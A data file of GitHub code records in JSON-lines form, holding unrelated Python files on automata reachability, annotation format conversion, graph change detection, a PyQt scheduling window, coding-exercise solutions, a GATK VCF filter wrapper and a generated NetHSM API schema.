pa_copy.product(trans_nfa)\n # spa = spa.get_trim_automaton()\n # spa.rename_states()\n # spa.__class__ = matrix_wfa.MatrixWFA\n\n for st, weight in self._reachable_states[act_pred].iteritems():\n tr_sum = 0.0\n for transition in self._pa_tr_dict[st]:\n if transition.symbol in symbols:\n tr_sum += transition.weight\n lang_aggr[transition.dest] += weight*transition.weight\n lang_weight += tr_sum*weight\n\n #Get initial and final vectors and compute the transition closure\n # closure = spa.compute_transition_closure(CLOSURE_MODE, ITERATIONS)\n # wfa_wrap = WFAReachabilityWrap(spa, pa_copy.get_initial_vector(), spa.get_final_ones(), closure)\n #\n # lang_weight, lang_aggr = self._get_pa_states_reachability(wfa_wrap, lang_aggr, lang_weight)\n\n self._reachable_states[state] = lang_aggr\n self._language_sum[state] = lang_weight\n\n #print state, lang_weight\n\n\n def 
process_self_loop_state_approx(self, state, sparse=False):\n \"\"\"Compute approximate state labels of the PA for a state state of the NFA.\n It is assumed that the state state has self-loops (transitions from\n predecessors are ignored).\n\n Keyword arguments:\n state -- State of the NFA.\n \"\"\"\n loop_transitions = []\n lang_aggr = dict()\n lang_weight = 0.0\n for sym in self._nfa.get_alphabet():\n loop_transitions.append(core_wfa.Transition(state, state, sym, 1.0))\n loop_nfa = nfa.NFA(loop_transitions, {state: 1.0}, {state: 1.0})\n loop_nfa.rename_states()\n\n pa_ini_states = self._reachable_states[state]\n pa_copy = copy.copy(self._pa)\n pa_copy.set_starts(pa_ini_states)\n\n spa = pa_copy.product(loop_nfa)\n spa = spa.get_trim_automaton()\n spa.rename_states()\n spa.__class__ = matrix_wfa.MatrixWFA\n\n #Get initial and final vectors and compute the transition closure\n closure = spa.compute_transition_closure(CLOSURE_MODE, sparse, ITERATIONS)\n wfa_wrap = WFAReachabilityWrap(spa, pa_copy.get_initial_vector(sparse), spa.get_final_ones(sparse), closure)\n lang_weight, lang_aggr = self._get_pa_states_reachability(wfa_wrap, lang_aggr, lang_weight)\n\n self._reachable_states[state] = lang_aggr\n self._language_sum[state] = lang_weight\n\n\n def process_states(self, sparse=False):\n \"\"\"Compute the state labels of all states of the NFA.\n \"\"\"\n for state in self._nfa.topological_sort_states():\n predecessors = list(self._nfa.get_predecessors(state))\n\n if state in predecessors:\n nfa_back = self._get_back_nfa(state, MAX_STATES)\n if nfa_back is None:\n self.process_branch_state(state, predecessors)\n self.process_self_loop_state_approx(state, sparse)\n else:\n self.process_backward_state(nfa_back, state, sparse)\n elif len(predecessors) >= 1:\n self.process_branch_state(state, predecessors)\n else:\n nfa_back = self._get_back_nfa(state, None)\n self.process_backward_state(nfa_back, state, sparse)\n #print state\n\n def process_backward_state(self, nfa_back, state, sparse=False):\n \"\"\"Compute state labels of the PA for a state state of the NFA (using\n the subautomata method).\n\n Keyword arguments:\n nfa_back -- Backward NFA.\n state -- State of the NFA whose state labels are computed.\n \"\"\"\n nfa_back.set_all_finals()\n wfa_back = self._pa.product(nfa_back)\n wfa_back = wfa_back.get_trim_automaton()\n wfa_back.rename_states()\n wfa_back.__class__ = matrix_wfa.MatrixWFA\n\n closure = wfa_back.compute_transition_closure(CLOSURE_MODE, sparse, ITERATIONS)\n wfa_wrap = WFAReachabilityWrap(wfa_back, self._pa.get_initial_vector(sparse), wfa_back.get_final_ones(sparse), closure)\n\n lang_weight, lang_aggr = self._get_pa_states_reachability(wfa_wrap, dict(), 0.0)\n\n self._reachable_states[state] = lang_aggr\n self._language_sum[state] = lang_weight\n #print self._reachable_states[state]\n","repo_name":"ondrik-network-hw/appreal","sub_path":"reduce/label/approximate_nfa_reachability.py","file_name":"approximate_nfa_reachability.py","file_ext":"py","file_size_in_byte":9624,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"31599024291","text":"\"\"\"\n This module converts COCO format dataset to labelme JSON files.\n\"\"\"\n\nimport glob\nimport os\nimport logging\nimport json\nfrom pathlib import Path\nfrom labelme.shape import Shape\nfrom keypoints import save_labels\n\nlogger = logging.getLogger(__name__)\n\n\nclass COCO2Labeme():\n \"\"\"\n Given COCO format dataset with annotation.json file and the parent \n folder that 
contains the images as provided in annotion images dict.\n Usage:\n cl = COCO2Labeme('/path/to/annotations_jsons',\n 'path/to/images_dir')\n cl.convert()\n \"\"\"\n\n def __init__(self, annotions, images_dir) -> None:\n self.annotations = annotions\n self.images_dir = images_dir\n\n def get_annos(self):\n \"\"\"find all anon json files\n\n Returns:\n list: json files\n \"\"\"\n annos = glob.glob(self.annotations + '/*.json')\n return annos\n\n def parse_coco_json(self, json_file):\n if not os.path.exists(json_file):\n logger.info(\"{json_file} does not exist\")\n\n with open(json_file, 'r') as jf:\n data = json.load(jf)\n return data\n\n def to_labelme(self, json_data):\n class_names = [name['name'] for name in json_data['categories']]\n images = json_data['images']\n annotations = json_data['annotations']\n\n for i, img in enumerate(images):\n label_list = []\n img_id = img['id']\n img_file_name = os.path.join(self.images_dir, img['file_name'])\n if not os.path.exists(img_file_name):\n logger.info(f\"Image file {img_file_name} does not exist!\")\n continue\n img_file_json = Path(img_file_name).with_suffix('.json')\n img_height = img['height']\n img_width = img['width']\n for annos in annotations:\n if int(annos['image_id']) == int(img_id):\n points = annos['segmentation'][0]\n cat_id = annos['category_id']\n\n s = Shape(label=class_names[cat_id],\n shape_type='polygon', flags={})\n for k in range(0, len(points)-1, 2):\n s.addPoint((points[k], points[k+1]))\n label_list.append(s)\n save_labels(img_file_json,\n img_file_name, label_list, img_height, img_width)\n\n def convert(self):\n json_files = self.get_annos()\n for jf in json_files:\n json_data = self.parse_coco_json(jf)\n self.to_labelme(json_data)\n logger.info(f\"Finished {jf} .\")\n\n\nif __name__ == '__main__':\n cl = COCO2Labeme('/path/to/dataset_coco/',\n '/path/to/dataset_coco/')\n cl.convert()\n","repo_name":"healthonrails/annolid","sub_path":"annolid/annotation/coco2labelme.py","file_name":"coco2labelme.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"21"} +{"seq_id":"3854778377","text":"import math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the breakingRecords function below.\ndef breakingRecords(scores):\n h_no = 0\n highest = scores[0]\n lowest = scores[0]\n l_no = 0\n for i in scores:\n if i > highest:\n h_no = h_no + 1\n highest = i \n if i < lowest:\n l_no = l_no + 1\n lowest = i\n \n return h_no,l_no\n \n \n \n \n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n scores = list(map(int, input().rstrip().split()))\n\n result = breakingRecords(scores)\n\n fptr.write(' '.join(map(str, result)))\n fptr.write('\\n')\n\n fptr.close()\n","repo_name":"darshanvjani/HackerRank_Practive","sub_path":"Algorithm/Breaking the Records.py","file_name":"Breaking the Records.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19552808866","text":"import math\nimport numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport random\nfrom scipy.linalg import subspace_angles\n\n### HELPER FUNCTIONS ###\n\ndef subspace_dist(A, B):\n '''\n Inputs: \n A, B - Two subspaces (columns of each matrix are basis for the subspace)\n Outputs: The distance between the two subspaces, defined as the Frobenius norm of the sine of principal angles\n '''\n return 
np.linalg.norm(np.sin(subspace_angles(A, B)))\n\ndef post_change_subspace(alpha, k, p0, p1, n):\n '''\n Inputs: \n alpha - parameter for proportion of nodes in C1, \n k - dimension of subspace\n p0, p1 - probabilities for edges within/between communities\n n - num of nodes\n Outputs: Leading k-dimensional subspace of expected post-change graph\n '''\n # Construct expected adjacency matrix\n n1 = round(n*alpha) # number of nodes in C1\n A_expected = p0*np.ones((n, n))\n A_expected[:n1, :n1] = p1 # Expected value for the upper left block is p1, rest are p0\n\n # Compute leading subspace\n wA, U = np.linalg.eigh(A_expected)\n return U[:, -k:]\n\n\ndef edd_vs_arl_param(trials, c):\n '''\n Input: \n trials - Number of trials to run\n c - correction parameter to use\n Output: edd and arl vectors averaged over the number of trials\n '''\n edd_avg = np.zeros(20)\n arl_avg = np.zeros(20)\n\n for t in range(trials):\n\n print(\"Starting Trial \" + str(t))\n\n ### INITIAL GRAPH: ERDOS-RENYI(n, p) ###\n\n n = 100 # number of nodes\n p0 = 2*math.log(n)/n # initial connection probability\n\n G0 = nx.generators.random_graphs.erdos_renyi_graph(n, p0)\n A0 = nx.to_numpy_matrix(G0)\n\n ### POST-CHANGE GRAPH: SBM (2 COMMUNITIES) ###\n\n p1 = 5*p0 # prob of edge within the emerging faction (community emerges on top of underlying E-R model)\n alpha = 0.15 # proportion of nodes in C1 (range from 0 to 1)\n\n size = round(n*alpha) # Size of faction\n A1 = A0.copy()\n for i in range(size):\n for j in range(i):\n if random.random() < p1:\n A1[i, j] = 1\n A1[j, i] = 1\n else:\n A1[i, j] = 0\n A1[j, i] = 0\n\n # plt.imshow(A0)\n # plt.title(\"Initial Adjacency Matrix\")\n # plt.show()\n # plt.imshow(A1)\n # plt.title(\"Post-Change Adjacency Matrix\")\n # plt.show()\n\n ### GENERATE SIGNALS ###\n\n # Define graph filter\n poly = lambda x: x**2\n H0 = poly(A0)\n H1 = poly(A1)\n\n # Signal parameters\n m = 10000 # number of signals to generate\n\n # Generate signals\n W = np.random.multivariate_normal(np.zeros(n), np.eye(n), m).T # white noise\n Y_arl = np.dot(H0, W) # pre-change only (for ARL calculation)\n Y_edd = np.dot(H1, W) # post-change only (for EDD calculation)\n\n\n ### DETECTION SETUP ###\n\n k = 2 # Number of eigenvectors to consider\n window_size = 25 # For covariance estimates\n\n wA, U = np.linalg.eigh(A0)\n U0 = U[:, -k:] # Initial subspace\n\n alphas = 0.01 * np.array(range(10, 91)) # Possible parameter values (discretized range from 0.25-0.75)\n U1 = {a:post_change_subspace(a, k, p0, p1, n) for a in alphas} # Dict alpha: subspace(alpha)\n\n cusum_arl = [0]\n for i in range(m - window_size + 1):\n window = Y_arl[:, i:i+window_size] # Signals in the current window\n C_hat = (1/window_size) * np.dot(window, window.T) # Empirical covariance\n wCs, Us = np.linalg.eigh(C_hat)\n U_hat = Us[:, -k:] # observed subspace\n alpha_hat = max(alphas, key=lambda a: np.linalg.norm(U1[a].T @ U_hat)) # Parameter estimate\n Lt = subspace_dist(U0, U1[alpha_hat]) - subspace_dist(U_hat, U1[alpha_hat]) - c\n cusum_arl.append(max(0, cusum_arl[-1] + Lt))\n\n cusum_edd = [0]\n for i in range(m - window_size + 1):\n window = Y_edd[:, i:i+window_size] # Signals in the current window\n C_hat = (1/window_size) * np.dot(window, window.T) # Empirical covariance\n wCs, Us = np.linalg.eigh(C_hat)\n U_hat = Us[:, -k:] # observed subspace\n alpha_hat = max(alphas, key=lambda a: np.linalg.norm(U1[a].T @ U_hat)) # Parameter estimate\n Lt = subspace_dist(U0, U1[alpha_hat]) - subspace_dist(U_hat, U1[alpha_hat]) - c\n cusum_edd.append(max(0, 
cusum_edd[-1] + Lt))\n\n\n thresholds = np.linspace(0.0, 1.5, 20)\n edd = []\n arl = []\n\n for threshold in thresholds:\n # ARL calculation\n rl = next((i for i in range(m-window_size+1) if cusum_arl[i] > threshold), m) # first index where cusum > threshold\n arl.append(rl)\n # EDD calculation\n dd = next((i for i in range(m-window_size+1) if cusum_edd[i] > threshold), m) # first index where cusum > threshold\n edd.append(dd)\n \n print(arl)\n print(edd)\n edd_avg += edd\n arl_avg += arl\n\n arl_avg /= trials\n edd_avg /= trials\n return arl_avg, edd_avg\n\n\nif __name__ == \"__main__\":\n for c in [0.0, 0.01, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07]:\n print(\"c = \" + str(c))\n arl, edd = edd_vs_arl_param(trials=25, c=c)\n np.save(\"ef_param_arl_\" + str(c), arl)\n np.save(\"ef_param_edd_\" + str(c), edd)\n\n\n\n\n# plt.plot(arl, edd)\n# plt.xscale('log')\n# plt.xlabel(\"Average Run Length\")\n# plt.ylabel(\"Expected Detection Delay\")\n# plt.title(\"EDD vs ARL for Emerging Faction\")\n# plt.show()","repo_name":"chiraagk7/graph-cusum","sub_path":"Emerging Community/edd_vs_arl.py","file_name":"edd_vs_arl.py","file_ext":"py","file_size_in_byte":5637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73877834614","text":"stack=[]\r\ndef push():\r\n element=input(\"enter the element to be inserted:\")\r\n stack.append(element)\r\n print(stack) \r\n return\r\n\r\ndef pop():\r\n if len(stack)==0:\r\n print(\"the stack is empty\")\r\n else:\r\n e=stack.pop()\r\n print(\"the removed element is:\",e)\r\n print(stack)\r\n\r\ndef full():\r\n print(\"the stack is overloaded\")\r\n print(\"select one option to perform operation on stack:\")\r\n print(\"enter \\\"2\\\" for removing an element\")\r\n print(\"enetr \\\"3\\\" to exit\")\r\n choice=int(input(\"please enter your choice:\"))\r\n if choice==2:\r\n pop()\r\n elif choice==3:\r\n exit\r\n else:\r\n print(\"please enter a valid choice\")\r\n\r\n\r\ndef empty():\r\n print(\"the stack is empty\")\r\n print(\"select one option to perform operation on stack:\")\r\n print(\"enter \\\"1\\\" for inserting an element\")\r\n print(\"enetr \\\"3\\\" to exit\")\r\n choice=int(input(\"please enter your choice:\"))\r\n if choice==1:\r\n push()\r\n elif choice==3:\r\n exit\r\n else:\r\n print(\"please enter a valid choice\")\r\nn=int(input(\"please enter the limit of stack:\"))\r\nwhile True:\r\n print(\"select one option to perform operation on stack:\")\r\n print(\"enter \\\"1\\\" for pushing an element\")\r\n print(\"enter \\\"2\\\" for removing an element\")\r\n print(\"enetr \\\"3\\\" to exit\")\r\n choice=int(input(\"please enter your choice:\"))\r\n if choice==1:\r\n if len(stack)>n-1:\r\n full()\r\n else:\r\n push()\r\n elif choice==2:\r\n if len(stack)==0:\r\n empty()\r\n else:\r\n pop()\r\n elif choice==3:\r\n break\r\n \r\n else:\r\n print(\"please enter a valid choice\")\r\n","repo_name":"gangadhararaviteja/Data-structures","sub_path":"Data Structures/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72775046774","text":"import sys\r\ninput=sys.stdin.readline\r\n\r\n\r\narr = list(map(str, input().strip()))\r\nstack = []\r\nanswer = \"\"\r\n\r\n\r\nfor i in arr:\r\n if i.isalpha():\r\n answer+=i\r\n elif i==\"(\":\r\n stack.append(i)\r\n elif i==\"*\" or i==\"/\":\r\n while stack and (stack[-1]==\"*\" or stack[-1]==\"/\"):\r\n answer+=stack.pop()\r\n 
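# operators of equal precedence are popped first (left associativity) before i is pushed\r\n        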
stack.append(i)\r\n    elif i==\"+\" or i==\"-\":\r\n        while stack and stack[-1] !=\"(\":\r\n            answer+=stack.pop()\r\n        stack.append(i)\r\n    elif i==\")\":\r\n        while stack and stack[-1]!=\"(\":\r\n            answer+=stack.pop()\r\n        stack.pop()\r\n\r\n\r\nwhile stack:\r\n    answer+=stack.pop()\r\n\r\n\r\nprint(answer)","repo_name":"JangAyeon/Algorithm","sub_path":"백준/Gold/1918. 후위 표기식/후위 표기식.py","file_name":"후위 표기식.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"4655180384","text":"# Email:fanyucai1@126.com\n# 2019.1.7\n\nimport os\nimport subprocess\nimport argparse\n\nGATK4 = \"/data02/software/GATK/gatk-4.0.11.0/gatk\"\njava = \"/data02/software/java/jdk1.8.0_191/bin/\"\n\nparser = argparse.ArgumentParser(\"This script will filter vcf.\")\nparser.add_argument(\"-v\", \"--vcf\", help=\"your vcf\", type=str, required=True)\nparser.add_argument(\"-r\", \"--ref\", help=\"reference fasta\", type=str, required=True)\nparser.add_argument(\"-o\", \"--outdir\", help=\"output directory\", type=str, default=os.getcwd())\nparser.add_argument(\"-p\", \"--prefix\", help=\"prefix of output,default:out\", type=str, default=\"out\")\n# result.type is read below but the option was never defined; assume an RNAseq default\nparser.add_argument(\"-t\", \"--type\", help=\"data type,default:RNAseq\", type=str, default=\"RNAseq\")\n\nresult = parser.parse_args()\nresult.vcf=os.path.abspath(result.vcf)\nresult.ref=os.path.abspath(result.ref)\n\nif result.outdir:\n    result.outdir=os.path.abspath(result.outdir)\n    subprocess.check_call(\"mkdir -p %s\" %(result.outdir),shell=True)\nos.chdir(result.outdir)\n\n##############################################https://github.com/gatk-workflows/gatk3-4-rnaseq-germline-snps-indels/blob/master/rna-germline-variant-calling.wdl\nif result.type == \"RNAseq\":\n    subprocess.check_call(\n        \"export PATH=%s\\$PATH && %s --java-options -Xmx10G VariantFiltration -R %s -V %s -cluster 3 -window 35 -filter-name \\\"FS\\\" -filter \\\"FS > 30.0\\\" -filter-name \\\"QD\\\" -filter \\\"QD < 2.0\\\" -O %s/%s.vcf\" %(java,GATK4,result.ref,result.vcf,result.outdir,result.prefix),shell=True)","repo_name":"fanyucai1/script","sub_path":"GATK_RNAseq_vcf_filter.py","file_name":"GATK_RNAseq_vcf_filter.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"74435871148","text":"def search_tree(key, tree):\n    visited = []\n    while tree is not None:\n        node_key, value, left, right = tree\n        visited.append(node_key)\n        if key == node_key:\n            return (value, visited)\n        elif key < node_key:\n            tree = left\n        else:\n            tree = right\n    return None\n","repo_name":"PedroLunet/FP","sub_path":"TP11/exercise3.py","file_name":"exercise3.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"6880146728","text":"import datetime\nimport sys\n\nfrom PyQt5.QtWidgets import QFormLayout, QHBoxLayout\nfrom PyQt5.QtWidgets import QLabel, QComboBox\nfrom PyQt5.QtWidgets import QPushButton, QApplication\nfrom PyQt5.QtGui import QIcon\n\nfrom project.BackEnd.Preset import Presets\nfrom project.BackEnd.Routine import Routine\nfrom project.BackEnd.Schedule import import_schedule, generate_image, Event\nfrom project.BackEnd.TimeList import TimeList\nfrom project.gui.general_window_gui import GeneralWindow\nfrom project.gui import palette\n\n\nclass AddRoutineWindow(GeneralWindow):\n\n    def __init__(self, window_list, prefs):\n        super().__init__(window_list, prefs)\n\n    def init_ui(self):\n        # Window Styling\n        self.setWindowTitle(\"Add Routine\")\n        
self.setStyleSheet(\"color: 'white';\" +\n \"font-size: 13px;\" +\n \"background-color: #303136;\"\n )\n icon = QIcon(self.prefs.images['icon_add'])\n self.setWindowIcon(icon)\n self.setFixedWidth(300)\n\n # Layout\n form_layout = QFormLayout()\n form_layout.setSpacing(10)\n form_layout.setHorizontalSpacing(50)\n\n # Title\n title = QLabel('Add Routine')\n title.setContentsMargins(0,10,0,10)\n title.setStyleSheet(self.prefs.style_sheets['text_title'])\n\n # category\n title_category = QLabel('Category')\n title_category.setStyleSheet(self.prefs.style_sheets['text_mute_tight'])\n self.category = QComboBox(self)\n self.category.setStyleSheet(\"padding: 5px 10px;\")\n categories = [\"Sleep\", \"Lunch\", \"Dinner\", \"Other\"]\n self.category.addItems(categories)\n\n # start time\n title_start_time = QLabel('Start Time')\n\n start_time_layout = QHBoxLayout()\n start_time_layout.addWidget(QLabel(\"Start time\"))\n start_time_layout.addStretch(1)\n\n self.start_hour = QComboBox(self)\n self.start_hour.addItems([f'{x}' for x in range(24)])\n start_time_layout.addWidget(self.start_hour)\n start_time_layout.addWidget(QLabel('h'))\n self.start_min = QComboBox(self)\n self.start_min.addItems(['0', '15', '30', '45'])\n start_time_layout.addWidget(self.start_min)\n start_time_layout.addWidget(QLabel('m'))\n\n # End time\n title_end_time = QLabel(\"End time\")\n end_time_layout = QHBoxLayout()\n end_time_layout.addWidget(QLabel(\"End time\"))\n end_time_layout.addStretch(1)\n\n self.end_hour = QComboBox(self)\n self.end_hour.addItems([f'{x}' for x in range(24)])\n end_time_layout.addWidget(self.end_hour)\n end_time_layout.addWidget(QLabel('h'))\n self.end_min = QComboBox(self)\n self.end_min.addItems(['0', '15', '30', '45'])\n end_time_layout.addWidget(self.end_min)\n end_time_layout.addWidget(QLabel('m'))\n\n # recurrence\n title_recurrence = QLabel('Recurrence')\n title_recurrence.setStyleSheet(self.prefs.style_sheets['text_mute_tight'])\n self.recurrence = QComboBox(self)\n self.recurrence.setStyleSheet(\"padding: 5px 10px;\")\n recurrences = [\"Every day\", 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday',\\\n \"Weekdays\", \"Weekend\"]\n self.recurrence.addItems(recurrences)\n\n # add button\n self.add_button = QPushButton(\"Add\")\n self.add_button.setStyleSheet(self.prefs.style_sheets['button_priority_rect'])\n self.add_button.clicked.connect(self.add_routine)\n\n # Overlap text\n self.overlap_text = QLabel()\n self.overlap_text.setWordWrap(True)\n\n # add widgets to layout\n form_layout.addRow(title)\n form_layout.addRow(title_category, self.category)\n form_layout.addRow(start_time_layout)\n form_layout.addRow(end_time_layout)\n form_layout.addRow(title_recurrence, self.recurrence)\n form_layout.addRow(self.overlap_text)\n form_layout.addRow(self.add_button)\n self.setLayout(form_layout)\n\n # def update_endtime(self):\n # start = self.start_time.time()\n # dur = self.duration.value()\n # end = start.addSecs(int(dur*5*60))\n # self.end_time.setText(\"End time: \" + end.toString())\n\n def add_routine(self):\n\n # get all values\n # start = self.start_time.time().toString()\n # dur = self.duration.value() # slots\n presets = Presets()\n start = datetime.time(int(self.start_hour.currentText()), int(self.start_min.currentText()))\n end = datetime.time(int(self.end_hour.currentText()), int(self.end_min.currentText()))\n # dummydate = datetime.date(1, 1, 1)\n # start_dum = datetime.datetime.combine(dummydate, start)\n # end = datetime.datetime.combine(dummydate, end)\n # 
duration = end - start_dum\n        # slots = divmod(duration.total_seconds(), 900)[0]\n\n        name = self.category.currentText()\n\n\n        days = self.recurrence.currentText()\n\n        day_dict = {\"Monday\": [0], \"Tuesday\": [1], \"Wednesday\": [2],\n                    \"Thursday\": [3], \"Friday\": [4], \"Saturday\": [5],\n                    \"Sunday\": [6], \"Weekdays\": range(5), \"Weekend\": [5, 6],\n                    \"Every day\": range(7)}\n\n        # add event to schedule\n        tl = TimeList()\n        tl1 = TimeList()\n        for start_day in day_dict[days]:\n            start_time = int((start.hour*60+start.minute)/presets.time_interval)\n            end_time = int((end.hour*60+end.minute)/presets.time_interval)-1\n            end_day = start_day\n            if end_time < start_time:\n                end_day = start_day+1\n            tl.add_time(start_day, start_time, end_day, end_time)\n            if name == \"Sleep\":\n                dur = (datetime.time.fromisoformat(presets.length_morning_routine).minute +\\\n                      datetime.time.fromisoformat(presets.length_morning_routine).hour*60)/presets.time_interval\n                tl1.add_duration(end_day, end_time+1, dur)\n        routine = Routine(-1, name, tl)\n        vars = routine.create_event()\n        event = Event(vars[0], vars[1], vars[2], vars[3])\n        schedule = import_schedule()\n        # Check overlap\n        if schedule.check_overlap(event):\n            # display info\n            self.notify_overlap()\n        else:\n            routine.export_routine()\n            schedule.add_event(event)\n            schedule.export_schedule()\n            generate_image()\n            if routine.name == \"Sleep\":\n                routine1 = Routine(-1, \"Morning Routine\", tl1)\n                vars1 = routine1.create_event()\n                event1 = Event(vars1[0], vars1[1], vars1[2], vars1[3])\n                if schedule.check_overlap(event1):\n                    # display info\n                    self.notify_overlap()\n                else:\n                    routine1.export_routine()\n                    schedule.add_event(event1)\n                    schedule.export_schedule()\n                    generate_image()\n                    GeneralWindow.raise_event(self.ls_w, 'reload_routines')\n                    self.close()\n            else:\n                GeneralWindow.raise_event(self.ls_w, 'reload_routines')\n                self.close()\n\n\n\n\n    def notify_overlap(self):\n        text = \"The new routine overlaps with an existing routine.\"\n        self.overlap_text.setText(text)\n\n\n\n\nif __name__ == \"__main__\":\n    app = QApplication(sys.argv)\n    win = AddRoutineWindow([], palette.Prefs())\n\n    sys.exit(app.exec())\n","repo_name":"Hashim-K/TI3115TU","sub_path":"project/gui/add_routine_gui.py","file_name":"add_routine_gui.py","file_ext":"py","file_size_in_byte":7536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"5361647018","text":"\"\"\"\ntag: stack; tree; breadth-first search\n103. 
Binary Tree Zigzag Level Order Traversal\nhttps://leetcode.cn/problems/binary-tree-zigzag-level-order-traversal/\n\"\"\"\n\n\n# # Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, val=0, left=None, right=None):\n#         self.val = val\n#         self.left = left\n#         self.right = right\n\n\nfrom collections import deque\nfrom typing import List, Optional\n\n\nclass Solution:\n    def zigzagLevelOrder(self, root: Optional[TreeNode]) -> List[List[int]]:\n        if not root:\n            return []\n\n        res = []\n        queue = deque()\n        queue.append(root)\n        while queue:\n            level_size = len(queue)\n            level_res = []\n            for i in range(level_size):\n                node = queue.popleft()\n                level_res.append(node.val)\n                if node.left:\n                    queue.append(node.left)\n                if node.right:\n                    queue.append(node.right)\n            res.append(level_res)\n\n        zigzag_res = [item[::-1] if i % 2 == 1 else item for i, item in\n                      enumerate(res)]\n\n        return zigzag_res\n","repo_name":"ZhangRui111/AwesomeAlgorithm","sub_path":"leetcode/medium/103.py","file_name":"103.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"9967524290","text":"class Solution:\n    def getSub(self, a: int, b: int) -> int:\n        max_num=max(a,b)\n        min_num=min(a,b)\n        lst=[]\n        for i in range(max_num):\n            lst.append(1)\n        for j in range(min_num):\n            lst.remove(1)\n\n        return len(lst)\n\na = 1\nb = 2\n# a = 2\n# b = 3\ns1=Solution()\nprint(s1.getSub(a,b))","repo_name":"SACHINKV14/MCS_00_Sachin_Core_Python","sub_path":"practice 04 Dec/harsha_tasks/_27_jan_2022/substraction_of_two_integers.py","file_name":"substraction_of_two_integers.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"43011729075","text":"# coding: utf-8\n\n\"\"\"\n    NetHSM\n\n     All endpoints expect exactly the specified JSON. Additional properties will cause a Bad Request Error (400). All HTTP errors contain a JSON structure with an explanation of type string. All [base64](https://tools.ietf.org/html/rfc4648#section-4) encoded values are Big Endian. 
# noqa: E501\n The version of the OpenAPI document: v1\n Generated by: https://github.com/openapi-json-schema-tools/openapi-json-schema-generator\n\"\"\"\n\nfrom __future__ import annotations\nfrom nethsm.client.shared_imports.schema_imports import * # pyright: ignore [reportWildcardImportFromLibrary]\n\nTime: typing_extensions.TypeAlias = schemas.DateTimeSchema\nProperties = typing.TypedDict(\n 'Properties',\n {\n \"time\": typing.Type[Time],\n }\n)\n\n\nclass TimeConfigDict(schemas.immutabledict[str, schemas.OUTPUT_BASE_TYPES]):\n\n __required_keys__: typing.FrozenSet[str] = frozenset({\n \"time\",\n })\n __optional_keys__: typing.FrozenSet[str] = frozenset({\n })\n \n def __new__(\n cls,\n *,\n time: typing.Union[\n str,\n datetime.datetime\n ],\n configuration_: typing.Optional[schema_configuration.SchemaConfiguration] = None,\n **kwargs: schemas.INPUT_TYPES_ALL,\n ):\n arg_: typing.Dict[str, typing.Any] = {\n \"time\": time,\n }\n arg_.update(kwargs)\n used_arg_ = typing.cast(TimeConfigDictInput, arg_)\n return TimeConfig.validate(used_arg_, configuration=configuration_)\n \n @staticmethod\n def from_dict_(\n arg: typing.Union[\n TimeConfigDictInput,\n TimeConfigDict\n ],\n configuration: typing.Optional[schema_configuration.SchemaConfiguration] = None\n ) -> TimeConfigDict:\n return TimeConfig.validate(arg, configuration=configuration)\n \n @property\n def time(self) -> str:\n return typing.cast(\n str,\n self.__getitem__(\"time\")\n )\n \n def get_additional_property_(self, name: str) -> typing.Union[schemas.OUTPUT_BASE_TYPES, schemas.Unset]:\n schemas.raise_if_key_known(name, self.__required_keys__, self.__optional_keys__)\n return self.get(name, schemas.unset)\nTimeConfigDictInput = typing.Mapping[str, schemas.INPUT_TYPES_ALL]\n\n\n@dataclasses.dataclass(frozen=True)\nclass TimeConfig(\n schemas.Schema[TimeConfigDict, tuple]\n):\n \"\"\"NOTE: This class is auto generated by OpenAPI JSON Schema Generator.\n Ref: https://github.com/openapi-json-schema-tools/openapi-json-schema-generator\n\n Do not edit the class manually.\n \"\"\"\n types: typing.FrozenSet[typing.Type] = frozenset({schemas.immutabledict})\n required: typing.FrozenSet[str] = frozenset({\n \"time\",\n })\n properties: Properties = dataclasses.field(default_factory=lambda: schemas.typed_dict_to_instance(Properties)) # type: ignore\n type_to_output_cls: typing.Mapping[\n typing.Type,\n typing.Type\n ] = dataclasses.field(\n default_factory=lambda: {\n schemas.immutabledict: TimeConfigDict\n }\n )\n\n @classmethod\n def validate(\n cls,\n arg: typing.Union[\n TimeConfigDictInput,\n TimeConfigDict,\n ],\n configuration: typing.Optional[schema_configuration.SchemaConfiguration] = None\n ) -> TimeConfigDict:\n return super().validate_base(\n arg,\n configuration=configuration,\n )\n\n","repo_name":"Nitrokey/nethsm-sdk-py","sub_path":"nethsm/client/components/schema/time_config.py","file_name":"time_config.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23021537462","text":"# 'gst-launch-1.0 v4l2src ! videoscale ! videoconvert ! x264enc tune=zerolatency bitrate=500 speed-preset=superfast ! rtph264pay ! udpsink port=5000'\n# filesrc location=hncloud.mp4 ! decodebin ! omxh265enc ! mpegtsmux ! tcpserversink host=192.168.1.2 port=5000\n# filesrc location=test.mp4 ! decodebin 